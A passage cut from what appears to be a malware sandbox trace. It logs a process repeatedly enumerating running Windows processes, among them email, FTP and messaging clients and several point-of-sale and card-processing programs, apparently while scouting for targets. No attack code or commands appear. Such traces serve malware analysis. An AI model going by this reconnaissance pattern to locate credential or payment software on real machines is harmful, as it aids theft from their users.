hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0215.051] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0215.053] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0215.055] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0215.057] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0215.059] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0215.061] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0215.063] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0215.065] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0215.067] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0215.069] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0215.071] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0215.073] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0215.075] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0215.077] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0215.079] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0215.081] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0215.083] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0215.089] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0215.091] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0215.093] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0215.095] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0215.097] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0215.099] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0215.101] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0215.102] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0215.104] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0215.106] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0215.108] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0215.109] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0215.111] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0215.113] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x25c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0215.115] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0215.117] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0215.120] CloseHandle (hObject=0x2138) returned 1 [0215.120] Sleep (dwMilliseconds=0x64) [0215.222] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2138 [0215.238] Process32First (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0215.240] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x76, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0215.241] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0215.243] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0215.245] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0215.247] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0215.249] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0215.250] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0215.252] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0215.254] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.256] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.258] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0215.263] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.265] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.267] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.269] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.270] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.273] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.275] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.278] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0215.281] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0215.283] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0215.286] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0215.290] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.292] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0215.294] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0215.296] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0215.299] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0215.302] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0215.304] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0215.305] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.307] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0215.309] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0215.311] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0215.313] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.315] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0215.319] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0215.322] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0215.324] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0215.327] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0215.329] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0215.331] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0215.332] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0215.334] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0215.336] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0215.342] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0215.344] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0215.346] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0215.348] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0215.350] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0215.352] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, 